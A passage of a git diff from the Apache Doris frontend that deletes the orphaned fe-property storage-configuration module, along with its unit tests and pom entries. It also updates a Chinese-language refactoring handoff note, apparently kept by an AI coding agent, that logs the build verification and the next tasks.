      - * A {@code null} value means this storage backend contributes no Hadoop config (e.g. HTTP), preserving the - * legacy semantics where {@code hadoopConfigMap} was left null and the user-fs/disable-cache overlay was - * skipped. - */ - @Getter - protected Map hadoopConfigMap; - - /** - * Get backend configuration properties with optional runtime properties. - * This method allows passing runtime properties (like vended credentials) - * that should be merged with the base configuration. - * - * @param runtimeProperties additional runtime properties to merge, can be null - * @return Map of backend properties including runtime properties - */ - public Map getBackendConfigProperties(Map runtimeProperties) { - Map properties = new HashMap<>(getBackendConfigProperties()); - if (runtimeProperties != null && !runtimeProperties.isEmpty()) { - properties.putAll(runtimeProperties); - } - return properties; - } - - @Getter - protected Type type; - - - /** - * Creates a list of StorageProperties instances based on the provided properties. - *

      - * This method iterates through all registered storage providers and constructs one - * {@link StorageProperties} instance for each provider that recognizes the given properties. - *

      - * If no HDFSProperties is explicitly configured, a default HDFSProperties will be added - * automatically. The default HDFSProperties is inserted at index 0 to ensure that: - *

        - *
      • The list preserves a deterministic order (it is an ordered List).
      • - *
      • The default HDFS configuration does not override or shadow explicitly configured - * object storage providers, which are appended after detection.
      • - *
      - * - * @param origProps the raw property map used to initialize each StorageProperties instance - * @return an ordered list of StorageProperties instances - */ - public static List createAll(Map origProps) throws StoragePropertiesException { - List result = new ArrayList<>(); - // If the user has explicitly specified any fs.xx.support=true, disable guessIsMe heuristics - // for all providers to avoid false-positive matches from ambiguous endpoint strings. - boolean useGuess = !hasAnyExplicitFsSupport(origProps); - for (BiFunction, Boolean, StorageProperties> func : PROVIDERS) { - StorageProperties p = func.apply(origProps, useGuess); - if (p != null) { - result.add(p); - } - } - // When no explicit fs.xx.support flag is set, add a default HDFS storage as fallback. - // When the user has explicitly declared providers via fs.xx.support=true, skip the - // default HDFS to avoid injecting an unwanted provider into the result. - if (useGuess && result.stream().noneMatch(HdfsProperties.class::isInstance)) { - result.add(0, new HdfsProperties(origProps, false)); - } - - for (StorageProperties storageProperties : result) { - storageProperties.initNormalizeAndCheckProps(); - storageProperties.buildHadoopStorageConfig(); - } - return result; - } - - /** - * Creates a primary StorageProperties instance based on the provided properties. - *

      - * This method iterates through the list of supported storage types and returns the first - * matching StorageProperties instance. If no supported type is found, an exception is thrown. - * - * @param origProps the original properties map to create the StorageProperties instance - * @return a StorageProperties instance for the primary storage type - * @throws RuntimeException if no supported storage type is found - */ - public static StorageProperties createPrimary(Map origProps) { - // If the user has explicitly specified any fs.xx.support=true, disable guessIsMe heuristics - // for all providers to avoid false-positive matches from ambiguous endpoint strings. - boolean useGuess = !hasAnyExplicitFsSupport(origProps); - for (BiFunction, Boolean, StorageProperties> func : PROVIDERS) { - StorageProperties p = func.apply(origProps, useGuess); - if (p != null) { - p.initNormalizeAndCheckProps(); - p.buildHadoopStorageConfig(); - return p; - } - } - throw new StoragePropertiesException("No supported storage type found. Please check your configuration."); - } - - /** - * Connector-facing helper: builds the merged Hadoop object-storage config map ({@code fs.s3a.*}/{@code fs.oss.*}/ - * {@code fs.cosn.*}/{@code fs.obs.*}) for whatever object-store backends the raw properties configure. Unlike - * {@link #createAll}, it injects NO default HDFS fallback and does NOT fail when no object store is present - * (returns an empty map). HDFS / local / broker / http contribute nothing here: a connector overlays the raw - * {@code fs.*}/{@code dfs.*}/{@code hadoop.*} passthrough itself. Used by SPI connectors that build their own - * {@link java.util.Map}-backed Hadoop config (e.g. paimon) instead of importing fe-core's StorageProperties. - * - * @param origProps the raw user property map - * @return the merged object-storage Hadoop config keys (possibly empty), never null - */ - public static Map buildObjectStorageHadoopConfig(Map origProps) { - Map merged = new LinkedHashMap<>(); - boolean useGuess = !hasAnyExplicitFsSupport(origProps); - for (BiFunction, Boolean, StorageProperties> func : PROVIDERS) { - StorageProperties p = func.apply(origProps, useGuess); - if (p == null || !isObjectStorage(p.getType())) { - continue; - } - p.initNormalizeAndCheckProps(); - p.buildHadoopStorageConfig(); - if (p.getHadoopConfigMap() != null) { - merged.putAll(p.getHadoopConfigMap()); - } - } - return merged; - } - - /** Whether the given type is an object-storage backend (vs HDFS / broker / local / http / unknown). */ - private static boolean isObjectStorage(Type type) { - switch (type) { - case S3: - case OSS: - case OBS: - case COS: - case GCS: - case OSS_HDFS: - case MINIO: - case OZONE: - case AZURE: - return true; - default: - return false; - } - } - - /** - * Registry of all supported storage provider detection functions. - *

      - * Each entry is a {@link BiFunction} that takes: - *

        - *
      • {@code props} — the user-supplied property map
      • - *
      • {@code guess} — whether heuristic-based {@code guessIsMe} detection is enabled. - * When {@code false}, only explicit {@code fs.xx.support=true} flags are honored, - * preventing endpoint-based heuristics from causing false-positive matches - * across providers (e.g., an {@code aliyuncs.com} endpoint accidentally - * matching both OSS and S3).
      • - *
      - * Returns a {@link StorageProperties} instance if the provider matches, or {@code null} otherwise. - */ - private static final List, Boolean, StorageProperties>> PROVIDERS = - Arrays.asList( - (props, guess) -> (isFsSupport(props, FS_HDFS_SUPPORT) - || (guess && HdfsProperties.guessIsMe(props))) ? new HdfsProperties(props) : null, - (props, guess) -> { - // OSS-HDFS and OSS are mutually exclusive - check OSS-HDFS first - if ((isFsSupport(props, FS_OSS_HDFS_SUPPORT) - || isFsSupport(props, DEPRECATED_OSS_HDFS_SUPPORT)) - || (guess && OSSHdfsProperties.guessIsMe(props))) { - return new OSSHdfsProperties(props); - } - // Only check for regular OSS if OSS-HDFS is not enabled - if (isFsSupport(props, FS_OSS_SUPPORT) - || (guess && OSSProperties.guessIsMe(props))) { - return new OSSProperties(props); - } - return null; - }, - (props, guess) -> (isFsSupport(props, FS_S3_SUPPORT) - || (guess && S3Properties.guessIsMe(props))) ? new S3Properties(props) : null, - (props, guess) -> (isFsSupport(props, FS_OBS_SUPPORT) - || (guess && OBSProperties.guessIsMe(props))) ? new OBSProperties(props) : null, - (props, guess) -> (isFsSupport(props, FS_COS_SUPPORT) - || (guess && COSProperties.guessIsMe(props))) ? new COSProperties(props) : null, - (props, guess) -> (isFsSupport(props, FS_GCS_SUPPORT) - || (guess && GCSProperties.guessIsMe(props))) ? new GCSProperties(props) : null, - (props, guess) -> (isFsSupport(props, FS_AZURE_SUPPORT) - || (guess && AzureProperties.guessIsMe(props))) ? new AzureProperties(props) : null, - (props, guess) -> (isFsSupport(props, FS_MINIO_SUPPORT) - || (guess && MinioProperties.guessIsMe(props))) ? new MinioProperties(props) : null, - (props, guess) -> isFsSupport(props, FS_OZONE_SUPPORT) ? new OzoneProperties(props) : null, - (props, guess) -> (isFsSupport(props, FS_BROKER_SUPPORT) - || (guess && BrokerProperties.guessIsMe(props))) ? new BrokerProperties(props) : null, - (props, guess) -> (isFsSupport(props, FS_LOCAL_SUPPORT) - || (guess && LocalProperties.guessIsMe(props))) ? new LocalProperties(props) : null, - (props, guess) -> (isFsSupport(props, FS_HTTP_SUPPORT) - || (guess && HttpProperties.guessIsMe(props))) ? new HttpProperties(props) : null - ); - - protected StorageProperties(Type type, Map origProps) { - super(origProps); - this.type = type; - } - - private static boolean isFsSupport(Map origProps, String fsEnable) { - return origProps.getOrDefault(fsEnable, "false").equalsIgnoreCase("true"); - } - - /** - * Checks whether the user has explicitly set any {@code fs.xx.support=true} property. - *

      - * When at least one explicit {@code fs.xx.support} flag is present, the system should - * rely solely on these flags for provider matching and skip the heuristic-based - * {@code guessIsMe} inference. This prevents ambiguous endpoint strings (e.g., - * {@code aliyuncs.com}) from accidentally triggering multiple providers (e.g., - * both OSS and S3) at the same time. - * - * @param props the raw property map from user configuration - * @return {@code true} if any {@code fs.xx.support} property is explicitly set to "true" - */ - private static boolean hasAnyExplicitFsSupport(Map props) { - return isFsSupport(props, FS_HDFS_SUPPORT) - || isFsSupport(props, FS_S3_SUPPORT) - || isFsSupport(props, FS_GCS_SUPPORT) - || isFsSupport(props, FS_MINIO_SUPPORT) - || isFsSupport(props, FS_BROKER_SUPPORT) - || isFsSupport(props, FS_AZURE_SUPPORT) - || isFsSupport(props, FS_OSS_SUPPORT) - || isFsSupport(props, FS_OBS_SUPPORT) - || isFsSupport(props, FS_COS_SUPPORT) - || isFsSupport(props, FS_OSS_HDFS_SUPPORT) - || isFsSupport(props, FS_LOCAL_SUPPORT) - || isFsSupport(props, FS_HTTP_SUPPORT) - || isFsSupport(props, FS_OZONE_SUPPORT) - || isFsSupport(props, DEPRECATED_OSS_HDFS_SUPPORT); - } - - protected static boolean checkIdentifierKey(Map origProps, List fields) { - for (Field field : fields) { - field.setAccessible(true); - ConnectorProperty annotation = field.getAnnotation(ConnectorProperty.class); - for (String key : annotation.names()) { - if (origProps.containsKey(key)) { - return true; - } - } - } - return false; - } - - /** - * Validates the given URL string and returns a normalized URI in the format: scheme://authority/path. - *

      - * This method checks that the input is non-empty, the scheme is present and supported (e.g., hdfs, viewfs), - * and converts it into a canonical URI string. - * - * @param url the raw URL string to validate and normalize - * @return a normalized URI string with validated scheme and authority - * @throws StoragePropertiesException if the URL is empty, lacks a valid scheme, or contains an unsupported scheme - */ - public abstract String validateAndNormalizeUri(String url) throws StoragePropertiesException; - - /** - * Extracts the URI string from the provided properties map, validates it, and returns the normalized URI. - *

      - * This method checks that the 'uri' key exists in the property map, retrieves the value, - * and then delegates to {@link #validateAndNormalizeUri(String)} for further validation and normalization. - * - * @param loadProps the map containing load-related properties, including the URI under the key 'uri' - * @return a normalized and validated URI string - * @throws StoragePropertiesException if the 'uri' property is missing, empty, or invalid - */ - public abstract String validateAndGetUri(Map loadProps) throws StoragePropertiesException; - - public abstract String getStorageName(); - - private void buildHadoopStorageConfig() { - initializeHadoopStorageConfig(); - if (null == hadoopConfigMap) { - return; - } - appendUserFsConfig(origProps); - ensureDisableCache(hadoopConfigMap, origProps); - } - - private void appendUserFsConfig(Map userProps) { - userProps.forEach((k, v) -> { - if (k.startsWith(userFsPropsPrefix) && StringUtils.isNotBlank(v)) { - hadoopConfigMap.put(k, v); - } - }); - } - - protected abstract void initializeHadoopStorageConfig(); - - protected abstract Set schemas(); - - /** - * By default, Hadoop caches FileSystem instances per scheme and authority (e.g. s3a://bucket/), meaning that all - * subsequent calls using the same URI will reuse the same FileSystem object. - * In multi-tenant or dynamic credential environments — where different users may access the same bucket using - * different access keys or tokens — this cache reuse can lead to cross-credential contamination. - *

      - * Specifically, if the cache is not disabled, a FileSystem instance initialized with one set of credentials may - * be reused by another session targeting the same bucket but with a different AK/SK. This results in: - *

      - * Incorrect authentication (using stale credentials) - *

      - * Unexpected permission errors or access denial - *

      - * Potential data leakage between users - *

      - * To avoid such risks, the configuration property - * fs..impl.disable.cache - * must be set to true for all object storage backends (e.g., S3A, OSS, COS, OBS), ensuring that each new access - * creates an isolated FileSystem instance with its own credentials and configuration context. - */ - private void ensureDisableCache(Map conf, Map origProps) { - for (String schema : schemas()) { - String key = "fs." + schema + ".impl.disable.cache"; - String userValue = origProps.get(key); - if (StringUtils.isNotBlank(userValue)) { - conf.put(key, String.valueOf(BooleanUtils.toBoolean(userValue))); - } else { - conf.put(key, "true"); - } - } - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/exception/AzureAuthType.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/exception/AzureAuthType.java deleted file mode 100644 index 6ca8777574c445..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/exception/AzureAuthType.java +++ /dev/null @@ -1,23 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage.exception; - -public enum AzureAuthType { - OAuth2, - SharedKey; -} diff --git a/fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java b/fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java deleted file mode 100644 index d5e999de146fa1..00000000000000 --- a/fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java +++ /dev/null @@ -1,117 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.junit.jupiter.api.Assertions; -import org.junit.jupiter.api.Test; - -import java.util.HashMap; -import java.util.Map; - -/** - * Behavior tests for the extracted fe-property storage layer. - * - *

      WHY these matter: the connector (e.g. {@code PaimonCatalogFactory}) cannot import fe-core's - * {@code StorageProperties}, so today it hand-re-ports the {@code fs.s3a.*} derivation (the source of the MinIO - * credential bug). This module exists so a connector can instead call - * {@code StorageProperties.create(props).getHadoopConfigMap()}. These tests pin the two outputs a connector relies - * on — the Hadoop config map ({@code fs.s3a.*}, applied to the connector's own {@code Configuration}) and the - * BE-facing map ({@code AWS_*}) — so the derivation can never silently drift away from the legacy behavior. - */ -public class StoragePropertiesTest { - - private static Map minioProps() { - Map p = new HashMap<>(); - // fs.minio.support pins MinIO selection deterministically (explicit flag disables guessIsMe heuristics). - p.put("fs.minio.support", "true"); - p.put("minio.endpoint", "http://minio:9000"); - p.put("minio.access_key", "myak"); - p.put("minio.secret_key", "mysk"); - return p; - } - - @Test - public void minioProducesS3aHadoopConfigMap() { - StorageProperties sp = StorageProperties.createPrimary(minioProps()); - Assertions.assertEquals(StorageProperties.Type.MINIO, sp.getType()); - - // The module produces a Map (NOT a live Hadoop Configuration) for the connector to overlay. - Map hadoop = sp.getHadoopConfigMap(); - Assertions.assertNotNull(hadoop); - Assertions.assertEquals("http://minio:9000", hadoop.get("fs.s3a.endpoint")); - Assertions.assertEquals("myak", hadoop.get("fs.s3a.access.key")); - Assertions.assertEquals("mysk", hadoop.get("fs.s3a.secret.key")); - Assertions.assertEquals("us-east-1", hadoop.get("fs.s3a.endpoint.region")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", hadoop.get("fs.s3a.impl")); - // disable-cache must be on for object stores (per-credential FileSystem isolation). - Assertions.assertEquals("true", hadoop.get("fs.s3a.impl.disable.cache")); - } - - @Test - public void minioProducesBackendAwsMap() { - StorageProperties sp = StorageProperties.createPrimary(minioProps()); - Map be = sp.getBackendConfigProperties(); - Assertions.assertEquals("http://minio:9000", be.get("AWS_ENDPOINT")); - Assertions.assertEquals("myak", be.get("AWS_ACCESS_KEY")); - Assertions.assertEquals("mysk", be.get("AWS_SECRET_KEY")); - Assertions.assertEquals("us-east-1", be.get("AWS_REGION")); - // MinIO tuning defaults (100/10000/10000) — the exact values the connector re-port had to match. - Assertions.assertEquals("100", be.get("AWS_MAX_CONNECTIONS")); - } - - @Test - public void s3IsSelectedAndNormalizesUri() { - Map p = new HashMap<>(); - p.put("s3.endpoint", "s3.us-east-1.amazonaws.com"); - p.put("s3.access_key", "ak"); - p.put("s3.secret_key", "sk"); - p.put("s3.region", "us-east-1"); - StorageProperties sp = StorageProperties.createPrimary(p); - Assertions.assertEquals(StorageProperties.Type.S3, sp.getType()); - Assertions.assertEquals("s3.us-east-1.amazonaws.com", sp.getHadoopConfigMap().get("fs.s3a.endpoint")); - // Non-canonical schemes normalize to the canonical s3:// form BE understands. - Assertions.assertEquals("s3://bucket/key", sp.validateAndNormalizeUri("s3a://bucket/key")); - } - - @Test - public void guessOrderingKeepsMinioAndS3Distinct() { - // An amazonaws endpoint is S3, NOT MinIO: MinIO must defer to S3 so detection isn't hijacked. - Map s3 = new HashMap<>(); - s3.put("s3.endpoint", "s3.us-east-1.amazonaws.com"); - Assertions.assertTrue(S3Properties.guessIsMe(s3)); - Assertions.assertFalse(MinioProperties.guessIsMe(s3)); - - // A dedicated minio.* key with a non-amazonaws endpoint is MinIO. - Map mi = new HashMap<>(); - mi.put("minio.endpoint", "http://minio:9000"); - mi.put("minio.access_key", "ak"); - Assertions.assertTrue(MinioProperties.guessIsMe(mi)); - Assertions.assertFalse(S3Properties.guessIsMe(mi)); - } - - @Test - public void hadoopConfigMapIsNullForHttp() { - // HTTP contributes no Hadoop storage config — the null map signals "skip overlay" to consumers. - Map p = new HashMap<>(); - p.put("fs.http.support", "true"); - p.put("uri", "https://example.com/a.csv"); - StorageProperties sp = StorageProperties.createPrimary(p); - Assertions.assertEquals(StorageProperties.Type.HTTP, sp.getType()); - Assertions.assertNull(sp.getHadoopConfigMap()); - } -} diff --git a/fe/pom.xml b/fe/pom.xml index 302b29f881ec1e..713aa4785ec317 100644 --- a/fe/pom.xml +++ b/fe/pom.xml @@ -219,7 +219,6 @@ under the License. fe-foundation fe-kerberos - fe-property fe-common fe-catalog fe-filesystem @@ -826,11 +825,6 @@ under the License. fe-foundation ${project.version} - - ${project.groupId} - fe-property - ${project.version} - ${project.groupId} fe-common diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 32fdca243e13a0..183c5981ffae00 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,10 +7,14 @@ --- -**更新时间**:2026-06-18(实现 session:**P2-T03 ✅ paimon adapter cutover 到共享 metastore-spi**[commit `3c1e118dcfa`];**用户改下一阶段 = P1-T07 彻底删除 fe-property 孤儿模块**[D-016 授权],然后 P2-T04 → P2-T05 docker 真闸) +**更新时间**:2026-06-18(实现 session:**P1-T07 ✅ 彻底删除 fe-property 孤儿模块**[commit 待提交,D-016 授权超 D-005];全 FE reactor `test-compile` BUILD SUCCESS(fe-core 实编译,0 ERROR)= 证 module+dependencyManagement 删除无隐藏 transitive 消费者。**下一步 = P2-T04**[pom+gate,⚠️ `MetaStoreProviders` ServiceLoader 改 2-arg] → P2-T05 docker 真闸) **更新人**:Claude(Opus 4.8) -> **本 session P2 进度补注(最新在最前)**: +> **本 session 进度补注(最新在最前)**: +> - **P1-T07 ✅(commit 待提交,D-016)**:彻底删除 fe-property 孤儿模块(**覆盖 D-005「不删 fe-property」条款**;fe-core `datasource.property.{storage,metastore}` 两包仍禁碰、仍服务 hive/hudi/iceberg)。执行前按强制流程复核(读全套文档 + 对照真实代码 recon)+ 1 边界经 AskUserQuestion 定(5 处 stale 注释「一并清理」)。**改动**(白名单内):`git rm -r fe/fe-property/`(27 文件 = 26 java + pom)+ `rm` stale `target/`(目录全消);`fe/pom.xml` 删 `fe-property` + dependencyManagement 条目;5 处注释「fe-property」→「legacy」(paimon `PaimonCatalogFactory`×2/`PaimonConnector`×2/`PaimonCatalogFactoryTest`×1 + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`——保历史语义非改逻辑)。**RED/GREEN = 构建闸**(无 UT 可写,同 P1-T05 模式):whole-repo `grep fe-property`(排 plan-doc)=**0**、`grep org.apache.doris.property`=**0**;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 **0 ERROR**,1:53min);paimon 全模块 **278/0/1skip**、fe-filesystem-hdfs **78/0/0**、checkstyle 0、`tools/check-connector-imports.sh` exit 0、`git diff --name-only` 白名单干净。⚠️ **docker e2e 未跑**(D-012,留 P2-T05)。 +> - **决策**:无新决策(D-016 已预定本任务);唯一边界 = AskUserQuestion「5 处注释一并清理」(保历史语义、白名单内)。 +> +> **更早本 session(P2-T01..T03,已完成)**: > - **P2-T03 ✅(commit `3c1e118dcfa`)**:paimon 元存储**连接逻辑** cutover 到 P2-T02 建的共享 spi(paimon SDK Options 组装 + filesystem/jdbc 存储 Configuration **留连接器**,非连接事实)。**2 边界经 AskUserQuestion 定**:**D-014**(采用 spi 的 **legacy-faithful validate**——CREATE CATALOG 比当前 paimon 更严:HMS case-sensitive forbidIf(simple)/requireIf(kerberos)、REST case-sensitive `"dlf".equals`、DLF 在 CREATE 要求 OSS;故意向真 legacy 收敛)、**D-015**(JDBC **注册副作用留连接器**,仅纯 `resolveDriverUrl` 共享;不下移=单消费方+守 spi SDK/JVM-free,Rule 2)。**改动**(白名单内 5 main+2 test+pom,净 +318/−847):`validateProperties`→`MetaStoreProviders.bind(props,{}).validate()`;`createCatalog` HMS/DLF→`bind`+新薄 `PaimonCatalogFactory.assembleHiveConf(base,overrides)`(HMS seed `ctx.loadHiveConfResources` base 再叠 `toHiveConfOverrides`;DLF `assembleHiveConf(null,toDlfCatalogConf())`)、删 build-time `requireOssStorageForDlf`;两处 driver-url→`JdbcDriverSupport.resolveDriverUrl`;`PaimonCatalogFactory` 删 6 法+`KNOWN_FLAVORS`+加 `assembleHiveConf`;`PaimonConnectorProperties` 删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(**DV-008**:别名数组只**部分**删——`HMS_URI`/`REST_URI`/`JDBC_*` 仍被保留的 `buildCatalogOptions` 用)。**TDD**:新 `PaimonConnectorValidatePropertiesTest` 13/0(3 tightening RED→GREEN 实证)+ 删 28 旧 builder/validate 测(content parity 已由 spi `Hms/DlfMetaStorePropertiesTest` 13+7 覆盖)+ 2 `assembleHiveConf` 测(F2 layering)。**验证 paimon 全模块 278/0/1skip**(skip=live gated)、checkstyle 0、import-gate 0、白名单干净。**recon `wf_9437dd4e-06d`** verify=SOUND/READY(逐键 parity 通过);**对抗 review `wf_dd78ec4b-da5`** verify=READY/0 真 finding(唯一 MAJOR「kerberos.principal alias 未测」证伪=该键走 verbatim passthrough→测它恒真 tautology 违 Rule 9;隔离 binding 的 `service.principal`→`kerberos.principal` 方向已被 spi line72/80 覆盖)。⚠️ **docker e2e 未跑**(HMS/DLF live metastore=hive + 插件 zip ServiceLoader 发现 5 provider 在子优先 loader=P2-T05 真闸)。 > - **决策补**:D-014(采用 legacy-faithful validate)|D-015(JDBC 注册留连接器)|DV-008(别名数组部分删 + `bind` 取代 `parse` + 新 `assembleHiveConf` 助手)。 > - **P2-T02 ✅(commit `7ea63528bc4`)**:新建 `fe-connector-metastore-spi`(22 文件 = 15 main + 7 test)。**3 边界经 AskUserQuestion 定**:**DV-006**(fe-kerberos = compile-dep only,**零新代码**——recon 三重证伪 HANDOFF 旧写「增量补 authenticator 机制」:产出 `KerberosAuthSpec` 纯 String→值对象不需 hadoop,真 doAs 留 FE 侧 `ctx.executeAuthenticated`)、**DV-007**(parser storage 入参 = 中立 `Map storageHadoopConfig`,**非** `List`;spi **不**依赖 fe-filesystem-api,保持 hadoop/fs-free;parser 拥有 storage-overlay 以守 kerberos-after-storage 序)、全 5 后端一次 commit。**内容**:`MetaStoreProvider

      extends PluginFactory`(`supports`+abstract `bind(props,storageHadoopConfig)`)+ `MetaStoreProviders.bind` first-hit ServiceLoader 派发 + `MetaStoreParseUtils`(firstNonBlank/copyIfPresent/applyStorageConfig/matchedProperties + `CATALOG_TYPE_KEY=paimon.catalog.type`)+ `JdbcDriverSupport.resolveDriverUrl`(**仅纯 resolver**;driver 注册/DriverShim JVM 副作用无调用方 → 留 P2-T03,Rule 2)+ `AbstractMetaStoreProperties`(共享 raw/warehouse/matchedProperties)+ 5 `*MetaStorePropertiesImpl`(`@ConnectorProperty` 绑定,消灭 `PaimonConnectorProperties` 手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键,镜像 `S3FileSystemProvider`)+ 单 `META-INF/services`(5 行)。pom = metastore-api + fe-extension-spi + fe-foundation + fe-kerberos + commons-lang3(copy-plugin-deps phase=none)。**来源 = 上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化**(HiveConf→中立 Map、authenticator→facts);**fe-core 旧 `Paimon*MetaStoreProperties` 不动**。**HMS D-4 补回** legacy `HMSBaseProperties.buildRules` 的 forbidIf-simple/requireIf-kerberos(paimon 手抄 validate 漏;**CASE-SENSITIVE `Objects.equals` 对齐 ParamRules**,与 `buildHmsHiveConf` 的 `equalsIgnoreCase` 不对称**保留**)。验证:spi **41/0**、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import、白名单干净、**3 mutation RED→GREEN**(HMS 大小写敏感·kerberos-after-storage clobber·REST 大小写敏感)。**对抗 review `wf_2ddae04d-cf9`(4 lens + verify)**:0 BLOCKER;真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 才权威)已修;FS `supports()` 改 `type==null||equalsIgnoreCase`(去 trim 不对称 + 对齐 legacy reject-on-malformed);trim/accessPublic-proxyMode divergence 经核证「对齐权威 legacy contract、仅偏离非权威 paimon 手抄」→不改;补 12 测(storage re-key/clobber-via-storage-channel/alias-first-wins/username-overlay/DLF-S3-reject/dispatch-instanceof…)。**API 旁改 2 javadoc**(`getDriverUrl`「raw,consumer-resolves」+ `needsStorage` FS 准确性,诚实订正,白名单内)。⚠️ **docker 未跑**(T2 真闸 P2-T05)。 @@ -56,22 +60,15 @@ ## 当前状态 -- 阶段:Research ✅ / Design ✅(**16 决策 D-001..D-016**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 3/5 = P2-T01 + P2-T02 + P2-T03 ✅;P3a facts-carrier ✅)**。 -- 任务计数 **11/15**(P0: 2/2 ✅ | P1: 5/7,**P1-T06 推迟** + **P1-T07 新增=下一步** | **P2: 3/5** | P3a: 0/1,facts 切片 ✅ 机制待续[DV-006→P3b])| follow-up FU-T01/02/03 ✅| P3b 占位。 -- **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ `fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)。**paimon 连接器已 cutover 到共享 spi**(P2-T03)。**fe-property 已 0 消费者孤儿**(P1-T05 断边),**用户授权下一步彻底删除**(D-016)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 +- 阶段:Research ✅ / Design ✅(**16 决策 D-001..D-016**)/ **Implement 🚧(P1 storage 6/7 = P1-T07 ✅ + P1-T06 docker 推迟[D-012];P2: 3/5 = P2-T01 + P2-T02 + P2-T03 ✅;P3a facts-carrier ✅)**。 +- 任务计数 **12/15**(P0: 2/2 ✅ | P1: 6/7,**P1-T07 ✅** + **P1-T06 推迟** | **P2: 3/5** | P3a: 0/1,facts 切片 ✅ 机制待续[DV-006→P3b])| follow-up FU-T01/02/03 ✅| P3b 占位。 +- **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ `fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)。**paimon 连接器已 cutover 到共享 spi**(P2-T03)。**fe-property 已物理删除**(P1-T07 ✅,0 消费者孤儿移除;fe-core `datasource.property.{storage,metastore}` 两包仍在、仍服务 hive/hudi/iceberg)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 - ⚠️ **e2e/docker 全程未跑**(P1 storage 等价 T1 + P2 metastore T2/5-flavor 闸 一并留 P2-T05 docker 跑;D-012)。 -## 下一步(明确):**P1-T07 彻底删除 fe-property 模块**(用户 2026-06-18 定为下一阶段,D-016),然后 P2-T04 → P2-T05 +## 下一步(明确):**P2-T04 paimon pom + gate 核对**(含 ⚠️ MetaStoreProviders ServiceLoader 2-arg 修),然后 P2-T05 docker 真闸 > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 + 一句话复述。** -**P1-T07(彻底删除 fe-property 孤儿模块)— 下一步**: -- **背景**:P1-T05 断开 paimon→fe-property 依赖边后,fe-property = **0 消费者孤儿**。D-016 用户授权物理删除(**覆盖 D-005「不删 fe-property」条款**;fe-core `datasource.property.{storage,metastore}` 两包**仍禁碰**,仍服务 hive/hudi/iceberg)。WORKFLOW §4.1 白名单已把 `fe/fe-property/**` 移入允许删除区。 -- **做什么**:① 删 `fe/fe-property/` 整目录(26 java,pkg `org.apache.doris.property`);② 删 `fe/pom.xml` 的 `fe-property`(约 :222)+ dependencyManagement 里 fe-property 条目(约 :831);③ **可选** 清 5 处 stale 注释(删后悬空):`fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`/`HdfsConfigFileLoader` + paimon 的 `PaimonCatalogFactory`/`PaimonConnector`/`PaimonCatalogFactoryTest`(均提到「移植源/replaces fe-property」,白名单内)。 -- **现场 recon(2026-06-18 已做,执行 session 须复核 + 再跑一遍 whole-repo grep)**:`grep -rln fe-property`(排除 .git/fe-property/plan-doc/target)= 仅 `fe/pom.xml`(真)+ 上述 5 文件(注释);`grep org.apache.doris.property`(排除 fe-property dir)= **0 import**;**无 BE/docker/脚本/regression 引用** → 删除限于 `fe/`。 -- **TDD/验收**:**RED/GREEN = 构建闸**(无 UT 可写,同 P1-T05):删后**全 FE 构建 + paimon 全模块 UT 仍绿(278/0/1skip)= 证无隐藏 transitive 断裂**;`git status` 确认 `fe/fe-property/` 删除 + `fe/pom.xml` 两声明删除;checkstyle 0;import-gate PASS;白名单干净。**注意 maven**:删 module 后用 `-am package -Dassembly.skipAssembly=true -Dmaven.build.cache.enabled=false`(绝对 `-f`),并跑一次更大范围 reactor 编译确认无别处 transitive 依赖 fe-property(dependencyManagement 删除后若有隐藏消费者会编译失败=正好暴露)。 -- **依赖**:P1-T05。设计 §4 